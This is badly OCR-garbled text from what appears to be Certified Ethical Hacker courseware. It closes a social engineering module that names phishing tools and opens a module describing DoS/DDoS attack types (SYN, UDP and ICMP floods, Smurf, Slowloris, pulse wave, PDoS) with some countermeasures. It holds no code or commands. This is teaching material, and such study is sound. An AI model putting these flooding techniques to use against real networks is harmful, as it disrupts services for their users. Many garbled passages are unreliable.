Screenshot
Figure 9.16:
menu
and
engineeringtoolsare listedbelow
attack
options
+
SpeedPhish (SPF)
Framework (https://aithub.com)
+
(hetps://getgophish.com)
Gophish
+
Phisher(hetps://github.com)
King
LUCY(https://Avww.lucysecurity.com)
MSISimple (https://microsolved.com)
Phish
Modul
09 1276
Page tical MakingandCountermensores
by Comet
Copyright©
Audit Organization's for Phishing
Security Attacks using
OhPhish
(©
onphi is
a
web-base
poralt otest employees!
roel
‘uscepibityto
attacks
‘engineering
phishing
simulation
GHIPHISH
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure9.9:Screenshot
ofOhPhish
Module Summary
inthis
>
mole,
have
Seca the we
engineering
discussed following:
along wih various kinds
concepts ofsocial attacks
enineering
Insider
socal
engineering
technique
Human,computer,
threats
b ased
andmobile
a n thevarious forms
theyan take
on socal
Impersonation networking
ses
inthe
Detalls
of
variousdefend
countermessures
nextmal, we wlee
tht can
ow attackers
as walas
an organization
ethical
agains
soc
hackersnd penetration
testers,perform
DoS/0005 attacks
Module Summary
This modulediscussed socialengineeringconceptsalongwith various phases of social
engineering
attack. It alsodiscussed
socialengineeringtechniques.
various human-based,
Themodulediscussed
of insiderthreats.It gave an overview of impersonation
computer-based, andmobile-based
threats,including
insider thevarious types
on socialnetworking sites. It also
discussed identity theft and the typesof identitytheft.The moduleendedwith a detailed
discussion of various signs to watchfor and countermeasures to employi n order to defend
againstsocialengineeringattacks, insider
Thenext modulewill showhowattackers,
threats,
andidentitytheft.
hackersandpen testers,perform
as well as ethical
D0S/DD0Sattacks,
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
Certified Ethical Hacker
Module10:
Denial-of-Service
Module Objectives
ofDenisaSarce
‘overview (008)a ndOstrlbuted
Deniaof Service(DDaS)Atacks
oierentDoS/0D0S
Understanding Atak Techniques
Understanding
Various09Sand0005AttackTools
Oitferent
Understanding to DetectDoS
Techniques a ndDDoS
tacks
Understanding
oitferent
DaS/0D0S
Countermessues
Module Objectives
(005)andDistributedDenial-of-Service
Denial-of-Service (DDoS)
attacksare a majorthreat to
networks.Theseattacksattemptto makea machineor networkresource unavailable
computer
Usually,
to its authorizedusers. DoS/DD0S attacksexploitvulnerabilitiesi n the implementation
ControlProtocol(TCP)/Internet
of the Transmission Protocol(IP)modelor bugs i n a specific
operatingsystem(0S).
Thismodulestarts with an overview of DoSandDDoSattacksand thenprovides insightinto
differentDoS/DDeSattacktechniques. Later, the botnet network,
it discusses DoS/DDoS attack
tools,
to
techniques detectDoS/DDoS attacks,
andDoS/DDOS countermeasures.
of module,
At theend this
will do the
following:
you beableto
=
=
Describe
DoS/DD0S
concepts
Understand
attack
DoS/DDeStechniques
various
Describe
botnets
IllustrateDoS/DDoS
casestudies
Explaindifferent
DoS/DDoS attacktools
Apply bestpractices
to mitigateDoS/DDoSattacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
DoS/DDoSConcepts
Fora good of DoS/DDoS
understanding one must be familiar
attacks, with relatedconcepts
in
section
advance.This
defines
attacks
discusses
DDoS
attacks
DoSandDDoS and how work.
ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
What is a DoSAttack?
is
{©Denia.fService(00S) an attack computer
ona or
network
hat reduces,
restrits orprevents
Whatis a DoSAttack?
A.DOS attackis an attackon a computer or networkthat reduces, restricts,
or prevents a ccess
to system resources for legitimate users. in a DoSattack, attackersflood a victim'ssystemwith
nonlegitimate service requestsor trafficto overloadits resources and bring downthe system,
leading
system of goal
to the unavailability
performance,
or network
a is
the victim’s
The
websiteor at leastsignificantly
of DoSattack to keep
reducing
legitimate
thevictim’s
usersfrom using
The
rather
the system, than to gainunauthorized
following examples
are fortypes
access to a system
of Dosattacks:
or to corrupt data.
‘=
the victim'ssystem
Flooding with more trafficthan it can handle
=
=
Flooding (e.g,, Chat
a service
Crashing
a TCP/IP
(IRC])
events
handle
InternetRelay
stackbysending corruptpackets
with more thanit can
Crashing
a service by interactingwith it i n an unexpectedmanner
Hanging
a system bycausingit to go into an infiniteloop
ical andCountermensores
Mackin ©by E-Comel
Copyright
&.
4
A
agar Htc
10:1:Schematic
Figure ata DoS
attack
DoSattackshave variousformsand targetvariousservices.The attacks may cause the
following
of
Consumption resources
=
=
Consumption
ofbandwidth,
Actualphysical
data diskspace,CPUtime,or structures
destructionor alterationof networkcomponents
Destruction of programming
andfilesi n a computer
system
In general,DoSattackstarget networkbandwidthor connectivity. Bandwidthattacksoverflow
the networkwith a highvolumeof traffic by using existingnetwork resources, thereby
deprivinglegitimateusers of these resources, attacksoverflowa system
Connectivity with a
largenumberof connection requests, consumingall availableOSresources to preventthe
systemfrom processing legitimateuser requests.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is a DDoSAttack?
(©.
Cistituted denis-of-srvice
(Gotnet)attacking
single denying
thereby
target, of
(0005)a coordinatedatack thatinvolves&multitude compromised
service to users ofthe targeted sytem
systems
ImpactofDDos
|| do
de
How
Hew
DDoS
DDoS,
Whatis a DDoSAttack?
Source:http://searchsecurity.techtarget.com
A DDoSattackis a large-scale,
coordinatedattackon the availability
of services on a victim's
systemor networkresources, and it is launched through
indirectly many compromised
computers(botnets)
on the Internet.
definedbytheWorldWideWebSecurity
‘As FAQ,“A (DDoS)
distributeddenial-of-service attack
Usesmanycomputers to launcha coordinatedDoSattackagainst Using
one or more targets.
client/server
technology,
servicesignificantly
which serve
byharnessing
is ableto multiply
the perpetrator the effectiveness
the resources of multiple
as attack platforms.―
of the denialof
unwittingaccomplice
The flood of incomingmessages
computers,
to the targetsystem
essentially
forces
down,service
it to shut
The services underattackbelong
thereby denying to legitimate
to the “primary
victim,―
whereas
users
the compromised systems
used to launchthe attackare called “secondary The use of secondary
victims.― victims i n
performing a DDoS attackenablesthe attackerto mount a large and disruptiveattackwhile
‘making
it difficultto trackdownthe original
attacker.
Theprimaryobjective
of a DDoSattackis to firstgainadministrativea ccesson as manysystems
as possible.
In general, attackersuse a customizedattack scriptto identifypotentially
vulnerable
systems.After gainingaccessto the targetsystems, the attacker uploadsandruns
DDoSsoftwareon thesesystems at the time chosento launchtheattack,
DDoSattackshavebecomepopular becauseof the easy accessibility
of exploit
plans
andthe
negligible
amount ofbrainworkrequiredto execute them.Theseattackscan beverydangerous
becausetheycan quickly
consume the largest rendering
hostson the Internet, themuseless.
ical andCountermensores
Mackin ©by E-Comel
Copyright
The impactsof DDOS includethe lossof goodwill,
disablednetworks,
financiallosses,
and
disabledorganizations.
How doDDoSAttacksWork?
In a DDoSattack,
many applications
barrage a targetbrowseror networkwith fake exterior
requeststhat makethe system,network, browser, and disabled
or site slow,useless, or
unavailable.
Theattackerinitiates the DDoSattack bysending a command to zombieagents, whichare
Internet-connected computers compromised by an attackerthrough malwareprogramsto
performvarious maliciousactivities through a commandand control (C&C) server. These
zombieagentssenda connection requestto a largenumberof reflectorsystems with the
spoofedIP addressof the victim,whichcauses the reflectorsystems to presumethat these
requests
originate fromthevictim'smachine insteadof the zombie agents. Hence,the reflector
systemssendthe requested information(response to the connection request) to the victim
Consequently,the victim’s
machineis floodedwith unsolicitedresponses fromseveralreflector
computers simultaneously, which mayeither reducethe performance or cause the victim's
to
machine shutdowncompletely.
taht
8 2) Insaco te
Compromised
PCs(Zombies)
Compromived
PCs(Zombies)
a
gute10.2:SehematicafDes attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
DoS/DDoSAttack Techniques
implement
Attackers various techniques
to launchDoS/DDoS
attackso n targetcomputers or
networks.Thissection discusses of DoS/DDoS
the basiccategories attackvectors and various
attack
techniques.
Module1 0Page
1287 tical MakingandCountermensores
by
Copyright©
Comet
BasicCategories
of DoS/DDoSAttackVectors
‘Volumetric
Attacks ProtocolAttacks Application
LayerAttacks
bani
ofattack
T h emagnitude
ofa
other
types or
target (@consume
Ikeconnection
o f resources
stat tables
present
(@consumetheresources
servicesofanappliation,
thereby
making theap
resturedi n bit-pe-second
(bps)
of bandwidth
Types
(©ood stacks
depletion
magnitude
packets
(©The
measured
(00s)
andapplication
firewalls
in
oftacks
servers
per-second
Themagntude
of attack's
second(os)
(©Amplifeatonstacks
cer/post
stack 9 TT
Png
fDeath
atack
Spoeedeson
ood
andmur
ayer
ood stack | UoPppleation
BasicCategories
of DoS/DDoS
Attack Vectors
DDoSattacks mainlyaim to diminish the network bandwidth by exhausting network,
application,
or service resources,thereby legitimate
restricting users from accessing
system
or
DoS/DDoS
networkresources. In general, attackvectors are categorizedas follows
Volumetric Attacks
Theseattacksexhaustthe bandwidtheither within the targetnetwork/service or
betweenthe targetnetwork/service and the rest of the Internet to cause traffic
blockage, access to legitimate
preventing users. Theattackmagnitude is measured
in
bitspersecond(bps)
VolumetricDDoSattacksgenerally targetprotocols suchas the NetworkTimeProtocol
(NTP), Domain Name System (ONS), andSimple Service DiscoveryProtocol(SSDP), which
are statelessanddo not havebuilt-incongestion avoidancefeatures.Thegeneration of
a large numberof packets can cause the consumption of the entire bandwidthon the
network.A single machinecannot make enough requeststo overwhelmnetwork
equipment. Hence,i n DDoS attacks, the attackeruses severalcomputers to flood a
Victim.In thiscase,the attackercan controlallthemachines and instruct themto direct
traffic to the targetsystem. DDoSattacksflood a network, causing a significant
statisticalchange
i n networktrafficthat overwhelms
networkequipmentsuchas
switchesand routers. Attackers use the processing power of a largenumberof
geographically
distributedmachines hugetrafficdirectedat the victim,
to generate
whichis why
suchan attackis
called
DDOS
attack
a
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thereare two typesofbandwidth depletion
attacks:
In floodattack,
a zombiessendlarge volumesof traffic to the victim’s
systems
to
the bandwidthof thesesystems.
‘exhaust
© Inan amplification
attack, theattacker
or zombiestransfer messages to a broadcast
IPaddress.Thismethodamplifies
malicioustrafficthat consumes the bandwidthof
systems.
the victim's
Attackersuse botnetsandperform DDoSattacksbyflooding the network.The entire
bandwidthis usedup byattackers,and no bandwidthremains for legitimate
use. The
©.
are volumetric
following
attack
techniques:
for
examples
(UDP)
UserDatagram
Protocol floodattack
InternetControlMessage
Protocol(ICMP)
floodattack
of Death(PoD)
Ping attack
Smurf
attack
Pulsewave attack
Zero-day
attack
© MalformedIPpacket
floodattack
© Spoofed
IP packet
floodattack
Protocol
Attacks
Attackerscan also preventa ccessto a targetbyconsuming typesof resources other
than bandwidth, such as connection state tables. ProtocolDDoS attacksexhaust
o n the targetor on a specific
resources available devicebetweenthe targetand the
Internet. Theseattacks consume the connection state tables presenti n network
infrastructuredevicessuch as load balancers, firewalls,and applicationservers.
Consequently,no new connections will be allowed, becausethe devicewill be waiting
for existingconnections to closeor expire. In this case, the attack magnitude is
measuredin packets per second(pps) or connections per second(cps).Theseattacks
can even take over the state of millionsof connections maintainedbyhigh-capacity
devices.
Thefollowing
are examples
for protocol
attacktechniques:
Synchronize
(SYN)
floodattack © ACKandPUSHACKfloodattack
attack
Fragmentation © TCPconnection floodattack
‘Spoofed
sessionfloodattack © TCPstate exhaustionattack
‘Acknowledgement
(ACK)flood RST
attack
attack
floodattack
SYN-ACK
ical andCountermensores
Mackin ©by E-Comel
Copyright
Application Attacks
Layer
In theseattacks,the attackerattempts to exploit
vulnerabilitiesi n the application
layer
protocolor in the application itselfto preventlegitimate users fromaccessing the
application,Attacks on unpatched, vulnerable systemsdo not require as much
bandwidth or volumetric
a s protocol DDoSattacksforsucceeding.In application
DDoS
attacks,
the application layeror application
resources are consumedby opening
connections andleaving
themopen until no new connections can be made.These
attacksdestroy a specific aspectof an application
or service and can be effectivewith
one or a few attacking machines that producea lowtrafficrate. Furthermore, these
Themagnitude
attacksare very difficult to detectandmitigate. of attackis measured in
requestspersecond(rps).
Application-level
floodattacksresulti n the lossof services of a particular
network, such
as emailsandnetworkresources, or the temporary shutdownof applications and
this attack,
services. Through attackersexploit weaknesses in programmings ource code
to preventthe application legitimate
fromprocessing requests,
Severalkindsof DoSattacksrelyon software-relatedexploits
suchas bufferoverflows.A
bufferoverflowattacksendsexcessive datato a n application
that eithershutsdownthe
application
or forcesthe data sent to the application
to run on the host system. The
attack crashesa vulnerablesystem remotely bysending excessive traffic to an
application,
Occasionally,
attackerscan also execute arbitrary
code on the remote system via a
bufferoverflow.Sending too muchdata to an applicationoverwrites the data that
controlsthe program,enabling
the hackerto run theircodeinstead.
Using
© Floodweb
flood
attacks,
application-level
attackers
user
applicationslegitimate
with
do
the
following: attemptto
traffic
© Disrupt
service to a specific
systemor personby,for example,
blocking
@user's
access through invalidlogin
repeated attempts.
© Jamthe application
databaseconnection bycrafting
maliciousStructuredQuery
Language(SQL)queries
Application-level
flood attackscan resultin a substantiallossof money,service,and
reputationfor organizations.
Theseattacks occur after the establishmentof a
connection. Becausea connection is establishedand the trafficenteringthe target
appearsto be legitimate,
it is difficult to detecttheseattacks.However, if the user
the attack,they
identifies can stopit and trace it backto its source more easily than
othertypesof DDOS
attacks.
Thefollowing
are examples layer
forapplication attacktechniques:
TransferProtocol( HTT)
© Hypertext floodattack
Slowlorisattack
© layer
UDPapplication floodattack
ical andCountermensores
Mackin ©by E-Comel
Copyright
DoS/DDoSAttack Techniques
Next, the following
DoS/0DoS
attacktechniques
will bediscussed:
UDP
ICMP
attack
flood
flood
attack session
flood
spoofed
HTTPS attack
GET/POST
attack
=
Popattack
Smurf Slowloris
attack
attack
Pulsewave attack
UDPlayer
application floodattack
Multi-vectorattack
attack
Zero-day
SYNfloodattack
Peer-to-peer
(PDoS)
Permanent
DoS
attack
attack
Fragmentation
attack DistributedreflectionDoS(DRD0S)
ACKfloodattack attack
TCPstate exhaustionattack
ical andCountermensores
Mackin ©by E-Comel
Copyright
UDPFloodAttack
(©Anattacker
sendsspootedUDPpackets
® igh
at very
ratetoa remotehoston random
packet partsof
‘The
ofpackets
sever
Nooing UOP
3
repeatedly
causes
deckfornonexistent
the to
applatons
the
—
nacessible bythesystem
anreply
with
Leglimate
applications
are
andgiv error an ICMP"Destination
thisattack
consumes network
resources and walle ot
oS
bandwith,exhaustingthenetwork unt goesone
UDPFloodAttack
In a UDPflood attack,
an attackersendsspoofed UDPpackets at a very high
packet rate to a
UDPpackets
Consequently, legitimate
applications
a
remote hosto n randomportsof targetserver byusinga large
causesthe server to checkrepeatedly
becomeinaccessible
source IP range.Theflooding
for nonexistent applications
bythe system,
of
at the ports.
and any attemptsto
accessthemreturn an error replywith an ICMP“Destination
Unreachable―packet.Thisattack
consumes network resources and availablebandwidth,exhausting the networkuntil it goes
offline,
4
3:
UDP
loadstack
ical andCountermensores
Mackin ©by E-Comel
Copyright
ICMPFloodAttack
ICMPFloodAttack
Networkadministratorsuse ICMP primarily for IP operations, troubleshooting,and error
messagingfor undeliverablepackets.In this attack,attackerssendlarge volumesof ICMP echo
requestpackets to a victim'ssystem directly or through reflectionnetworks.Thesepackets
signal
the victim'ssystem to reply,
andthe large traffic saturates the bandwidthof the victim's
network connection,causingit to be overwhelmedand subsequently stop responding to
legitimate
TCP/IP
requests.
To protect ICMP floodattacks,
against it is necessaryto set a threshold thatinvokesthe ICMP
flood attack protectionfeaturewhenexceeded.Whenthe ICMPthresholdis exceeded(by
default,the thresholdvalueis 1000 packets/s),
the router rejects further ICMP echorequests
the
next security of
fromall addresses
second. the
in the same zone for the remainder current secondas well as
ical andCountermensores
Mackin ©by E-Comel
Copyright
with ECHO
attacker ‘The
attackersends ICMP
ECHO
Request
ECHO
Request
i |
Legitimate
a ICMP
request
ECHO rom
adressin thesame securityzone
Figure
20.4[CMPloadstack
Module0 1294
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
Pingof DeathandSmurfAttacks
Pingof DeathAttack
© InaPngotDen (Po) tack an atc es tea na Surf
Smurf
Attack.
tack,
the the
source
adress
tac sooo
porte
wate
the
vic
ent ache, nately
PingofDeathAttack
In a Pingof Death(PoD) attack,
an attackerattempts destabilize,
to crash, or freezethe target
system or service bysending malformedor oversizedpackets usinga simple ping command
Suppose an attackersendsa packet with a size of 65,538bytesto the targetweb server. This
size exceeds the size limit prescribed
byRFC791 IP,whichis 65,535bytes.The reassembly
processperformed bythe receivingsystemmightcause the systemto crash.In suchattacks,
the attacker'sidentity c an be easilyspoofed, and the attacker might not need detailed
knowledge ofthetargetmachine, exceptits IPaddress.
20Bvtes_saytes
ea
HEADERHEADER
Smurf
In a
Attack
Smurfattack,
the attackerspoofs
the source IP addresswith the victim'sIP addressand
sendsa large number of ICMPECHOrequest packetsto an IP broadcastnetwork.Thiscausesall
the hostso n the broadcastnetwork to respondto the receivedICMPECHO requests.These
responsesare sent to thevictim’s
machine becausethe IPaddress w as spoofed
bytheattacker,
causing
significant
traffic
victim’s
making
itcrash.
to the andultimately
machine
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacker
1 BroadcastNetwork
Victim
gure10.6Suc attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
PulseWaveand Zero-Day
DDoSAttacks
‘neato
have
oye ben patedreece
(2 pu
‘eng
(200
Gbps
oemorei s suicent to zou
thevc
deploys
pathfo thexpos 0005
PulseWaveDDoSAttack
Pulsewave DDoSattacksare the latesttypeof DDoSattacksemployed bythreat actors to
disrupt the standardoperationsof targets. Generally, DDoS attack patterns are continuous
incomingtrafficlows. However,
the attackis huge,
in pulsewave
DDoS
attacks,
the entire bandwidthof target
consuming
repetitivetrain of packets
as pulses
the attackpatternis periodic,
networks.Attackerssenda highly
to the targetvictim every10 min, andthe attacksession
and
enough an
lastsfor approximately hour or some days.
to crowda networkpipe. Recovery
impossible,
A single pulse
from suchattacks
(300Gbps or more) is more than
i s very difficultand occasionally
i 400 soos
107:Pulse
Figure wave 0D0S
a tta
Modul1 0Page
1297 ical andCountermensores
Mackin
©
Copyright
by E-Comel
Zero-Day
DDoSAttack
Zero-day
DDoSattacksare attacksi n which DDoSvulnerabilitiesdo not have patches or
effectivedefensivemechanisms.Until the victim identifiesthe threat actor'sattackstrategy
and deploys a patch
for the exploitedDDoSvulnerability,the attackeractivelyblocksall the
victim'sresources andstealsthe victim’s
data.Theseattackscan cause severe damage to the
Victim'snetworkinfrastructureand assets.Currently,
there is no versatileapproach to protect
networksfromthistypeof attack.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SYNFloodAttack
Thetarget
machine
get
the the
doesnot response becausesource
multiple
fending
smack
SY equetstoa
Rot,butnever the
repyingto
SYÂ¥N
Flood Attack
In a SYNattack,the attackersendsa large numberof SYNrequests to the targetserver (victim)
with fakesource IP addresses. Theattack creates incomplete TCPconnections that use up
networkresources. Normally, whena clientwants to begin a TCPconnection to a server, the
clientandserver exchange thefollowing seriesof messages
+
ATCPSYNrequest packetis sent toa server.
+
Theserver sendsa SYN/ACK (acknowledgement) i n responseto the request.
‘Theclientsendsa response
ACKto the server to complete
the session setup.
Thismethodisa “three-way
handshake.―
In a SYNattack,the attackerexploits the three-way handshakemethod.First,the attacker
sends a fake
to the client's(attacker's)
server waiting
to
TCPSYNrequestthe targetserver. the server sends
After
a SYN/ACK
i n response
request,the client never sendsa n ACKresponse.Thisleavesthe
to complete
the connection,
SYNflooding
takesadvantage
of the flawedmanner i n whichmost hostsimplement the TCP
three-way
handshake.Thisattack occurs when the attackersendsunlimitedSYNpackets
(requests)
to the host system.
The process of transmittingsuchpackets is fasterthan the
systemcan handle.Normally, withtheTCPthree-way
a connection is established handshake.
Thehostkeepstrackof partially ACKpackets
open connections whilewaitingfor response in a
listening
queue.
ical andCountermensores
Mackin ©by E-Comel
Copyright
As shownin the figure,
whenHost8 receives a SYNrequest fromHostA,it must keep
trackof
the partially
opened queue―
connection i n a “listen for at least75 s.
ao
4 Figure 10.8:
SYNfloodattack
malicioushostcan exploit
‘A anotherhost, managingmanypartial connectionsbysending many
SYNrequests to the
target
host
new connections until it drops
timeouts. Thisability
simultaneously. When
isfull,
the queue thesystem
s ome entries fromthe connection queuethrough
to hold up each incomplete
cannot open
handshake
connection for 75 s can be cumulatively
exploited in a DoSattack.Theattackuses fake IP addresses, making it difficultto trace the
source. An attackerc an fill a tableof connectionseven without spoofingthe source IP address.
attackers
In addition to SYNflood attacks, can alsoemploySYN-ACK and ACK/PUSHACKflood
attacksto disrupt targetmachines.All theseattacksare similarin functionality
with minor
variations.
FloodAttack
SYN-ACK
tothe
Thistypeof attackis similar
attacker
exploits
ACKpackets of
SYNfloodattack,
except
thattype
in this
handshakebysending
the secondstage a three-way
to exhaust
to the targetmachine its resources, a of
of floodattack,the
large number SYN:
‘ACK
andPUSHACKFloodAttack
During ACKare the flags
a n active TCPsession,ACKandPUSH usedto transferinformationto
andfromthe server andclientmachinestill the sessionends.In an ACKandPUSHACKflood
attack,
attackerssenda largeamount of spoofed ACKand PUSHACKpackets to the target
making
machine, it non-functional
ical andCountermensores
Mackin ©by E-Comel
Copyright
forSYNFloodAttacks
Countermeasures
Properpacket
filtering
is a viablesolutionto SYNfloodattacks.An administratorc an alsotune
stackto reducethe impactof SYNattackswhileallowing
the TCP/IP legitimate
clienttraffic.
SomeSYNattacks donot attemptto upsetservers; instead, theyattemptto consume theentire
bandwidthof the Internet connection. Twotools to counter this attackare SYNcookiesand
SynAttackProtect.
To guard against an attacker
attempting to consume the bandwidth of an Internetconnection,
an administratorcan implement some additional safety measures; for example, theycan
decrease the time-out period i n which a pending connection is maintainedin the “SYN
RECEIVED" state in the queue. Normally, if a client sendsn o response ACK, a server will
retransmit the firstACKpacket.Thisvulnerability can beremovedbydecreasing the time ofthe
first packet's decreasing
retransmission, the numberof packet retransmissions,or turning off
retransmissionsentirely.
packet
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attack
Fragmentation
Fecal n d OPS
Packet
Original
‘aa
segment
| [Data
segment
2
Fragmentation
Attack
Theseattacksdestroy
a victim'sabilityto reassemblefragmented packetsbyflooding it with
or UDPfragments,
‘TCP resultingi n reducedperformance.In fragmentation
attacks,
the attacker
sendsa largenumberof fragmented (1500+ byte)packets to a targetweb server with a
smallpacket
relatively rate. Sincethe protocolallowsfragmentation,thesepackets are usually
Uninspected as theypassthrough network equipment suchas routers,firewalls,and the
intrusion detection system (IDS)/intrusion preventionsystem (IPS). The reassemblyand
inspection of theselargefragmented packets consume excessive resources. Moreover,the
content i n the packetfragments is randomized bythe attacker,whichmakesthe reassembly
andinspection consume more resourcesand, the system
i n turn, causes to crash.
Original
Packet
‘Data
segment
|Data
segment
|Data
segment
|Data
segment 3
4
‘segment
—
1
Fragment†” =
Fragment = =
108:Fragmentation
Figure attack
3
Frogment —
4
Fragment †”
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionFloodAttack
Spoofed
|@ Attackersceeatefake
or spoofed
TCPsessions by carrying
lip
attack agaistthe
targetnetworkexhausting ts networkresources
‘tackers
create
session
with
‘one
multiple
@
pbAttackers
or more
creat
session
by
completely
fake
RSTor FINpackets
a fake
tultpleACKpackets
along
FSTor FINpackets
wth one of more
SessionFloodAttack
Spoofed
In this typeof attack,
attackerscreate fake or spoofed TCPsessions bycarrying multiple
SYN,
ACK, andRSTor FIN packets. Attackersemploy thisattackto bypass firewallsandperform
DDoS
attacksagainst targetnetworks,exhaustingtheirnetworkresources.
Thefollowing
are examples
for spoofed
session floodattacks:
+
Multiple
SYN-ACKSpoofed
SessionFloodAttack
In this typeof floodattack,
attackerscreate a fakesessionwith multiple
SYNand
multiple ACKpackets,along
with one or more RSTor FINpackets.
‘Multiple
ACKSpoofed
SessionFloodAttack
In thistypeoffloodattack, create a fakesessionbycompletely
attackers skipping SYN
packets and using onlymultiple
ACKpackets along with one or more RSTor FINpackets.
BecauseSYNpackets are not employed andfirewallsmostly use SYNpacket filters to
detectabnormaltraffic, the DDoSdetectionrate of the firewallsis very low for these
of attacks.
types
ical andCountermensores
Mackin ©by E-Comel
Copyright
HTTPGET/POST
and SlowlorisAttacks
2B | ee 1D
HTTPGET/POSTAttack
HTTPattacksare layer-7
attacks.HTTPclients,
suchas web browsers,
connect to a web server
through
HTTPto sendHTTPrequests,
whichcan beeitherHTTPGETor HTTP POST. Attackers
exploit
theserequeststo perform DoSattacks.
In a n HTTP GETattack,
the attackeruses a time-delayedHTTPheaderto hold on to an HTTP
connection andexhaust
web-server resources. Theattackernever sendsthefull request
to the
targetserver. Consequently,
the server retains the HTTPconnection and waits,making it
for legitimate
inaccessible users. In thesetypesof attacks,
all the networkparameters
appear
healthy whilethe service remains unavailable.
In a n HTTP POSTattack, the attackersendsHTTP requests with complete headersbut an
Incomplete message body to the targetweb server or application. Because themessage body is
incomplete,
unavailable to legitimate users. of
the server waits for the rest the body, making theweb server or webapplication
ical andCountermensores
Mackin ©by E-Comel
Copyright
HTTPGETAttack
with time-delayed
Request HTTPheader
Target
serverwaitingfor complete
header
Attack
HTTP POST
body
Targetserver waitingfor message
to
the
extreme damage target.
RandomRecursive
GETFloodAttack
Thistypeofattackis a tweakedversion ofthe recursive GETfloodattack.It is designed
for forums,
blogs,
and other websitesthat have pages i n a sequence. Similarto the
recursive GET flood attack,i n
this attack,the recursive GETpretendsto be going
through pages.Because the targetsare forums, groups,andother blogs,
the attacker
uses randomnumbers from a validpagerangeto poseas a legitimate user andsends a
new GETrequest each time. In both recursive GETand randomrecursive GETflood
attacks,the targetis bombardedwith a large exhausting
numberof GET requests, its
resources.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Slowloris Attack
Slowlorisis a DDoS attacktool used to perform
layer-7
DDoS attacksto take down web
Itis distinctly
infrastructure. differentfromothertoolsin that it usesperfectly
legitimate
HTTP
traffic to take down a targetserver. In Slowlorisattacks, the attackersendspartialHTTP
requests to thetargetwebserver or application,
Upon receivingthe partial the target
requests,
server opens multiple connections and waits for the requests to complete.However, these
requests remain incomplete,
causingthetargetserver’smaximum concurrent connection pool
be
to filled up andadditionalconnection
attempts
be to denied.
NormalHTTP request-responseconnection
TTP response
SlowlorisDDoSattack
HITPrequest
ical andCountermensores
Mackin ©by E-Comel
Copyright
UDPApplication FloodAttack
Layer
1@someoftheUoP-based
application
thatemploy
layerprotocols attackerscan forlodingthetarget
networks
EBco
Netsios
5
|
S|
|
ver |
UDPApplication FloodAttack
Layer
Though some application
UDPfloodattacksare knownfor their volumetricattacknature, layer
that relyon UDPcan be employed
protocols byattackersto performfloodattackso n target
networks.
The following
are examples layerprotocols
application
for UDP-based that attackerscan
employforflooding
targetnetworks:
Character GeneratorProtocol FileTransferProtocol(TFTP)
‘Trivial
(CHARGEN) NetworkBasicInput/Output
System
Simple
NetworkManagement
Protocol (Wetsi0s)
Version
2 (SNMPv2)
{A0TD)
Guoteofthe Oxy
NP
QuakeNetworkProtocol
sspP
call
Remoteprocedure
(RPC) SteamProtocol
Voice over Internet Protocol(VoIP)
Lightweight
Connection-less Directory
Protocol(CLDAP)
‘Access
ical andCountermensores
Mackin ©by E-Comel
Copyright
Multi-VectorAttack CEH
Attacks
to sablethetage ystemor sevice
_tackers
rap change
attack
packets,
7)
nd repeatedly thefrm of thei 0005
insequence
Mult-Vector attack,
in parallel
‘Multi-Vector
Attack
In multi-vectorDDoSattacks,the attackeruses combinationsof volumetric,protocol,
and
applicationlayerattacksto take down the targetsystemor service. The attackerquickly
changes from one formof DDoSattack(e.g.,SYNpackets)to another(layer7).Theseattacks
are either launchedthrough
one vector at a time or through
multiple
vectors i n parallel
to
a company’s
confuse IT department,
making
them spend
all their resources and maliciously
diverting their
focus.
Mult-Vectorattack
in parallel
Figure
10:12:
Muttvectorattack
ical andCountermensores
Mackin ©by E-Comel
Copyright
Peer-to-Peer
Attack
‘tacksexploflawsoundinthenetwork
using
theD+ (DectConnect)
pots whichused fo
of
a l ypes
sharing
—o
=
Peer-to-Peer Attack
A peer-to-peerattackis a formof DDoSattacki n whichtheattackerexploits anumber of bugs
i n peer-to-peer
servers to initiate
use the DirectConnect(DC++) aDDOS
attack.
protocol,
Attackersexploit
flawsfound i n networksthat
whichallowsthe exchange
messagingclients.Thiskind of attackdoes not use
of filesbetweeninstant-
botnets.Unlikea botnet-basedattack,
a
peer-to-peer attack eliminates the needfor attackers to communicate with the clientsthey
subvert.Here, the attackerinstructsclientsof large file sharing
peer-to-peer hubsto disconnect
fromtheir peer-to-peer networkandinsteadconnect to the victim’s website.Consequently,
severalthousandcomputers may aggressively attemptto connect to a targetwebsite,
causinga
drop i n the performance of the targetwebsite.It is easyto identify
peer-to-peerattacksbased
on signatures. Byusingthis method, attackerslaunchmassive DoSattacksto compromise
websites.
Peer-to-peerDDoS attacks can be minimized by specifying portsfor peer-to-peer
communication. For example,
specifying
port 80 to disallowpeer-to-peer
communication
minimizes the possibility
of attackson websites,
oR 10.13Peer-to-peer
Figure attack
a
ical andCountermensores
Mackin ©by E-Comel
Copyright
PermanentDenial-of-ServiceAttack
damage
to system
hardware
other
Dos Unlike
to
or rina
replace
thesystem
tacts, sabotags
the harcware
hardware, the Wet
reguiing
Bricking
system, a hardware
a5updates
thsattackers
end atothe
Thisattackscari ou using method
Using metho,
known "biking system
fraudulent i
a an ep
aL Se
PermanentDenial-of-Service
Attack
PermanentDoS(PDoS) attacks,
alsoknownas phlashing, purely targethardwareand cause
irreversibledamage to the hardware,Unlikeothertypesof DoSattacks, it sabotagesthe system
hardware, requiringthe victim to replaceor reinstallthe hardware.ThePDoS attackexploits
securityflawsi n a deviceto allow remote administrationo n the management interfacesof the
hardware,
vietim’s suchas printers,routers,andother networking devices.
Thistypeof attackis quicker andmore destructivethanconventionalDoSattacks.It workswith
a limitedamount of resources, unlikea DDoSattack, i n whichattackers unleasha set of
zombiesonto a target.Attackersperform PDoSattacksbyusinga methodknown as the
“bricking―
of a system.In this method, the attackersendsemails, IRCchats, tweets,or videos
with fraudulent content for hardwareupdates to the victim. The hardwareupdates are
modifiedandcorrupted with vulnerabilitiesor defectivefirmware.Whenthe victim clickson a
link or pop-upwindow
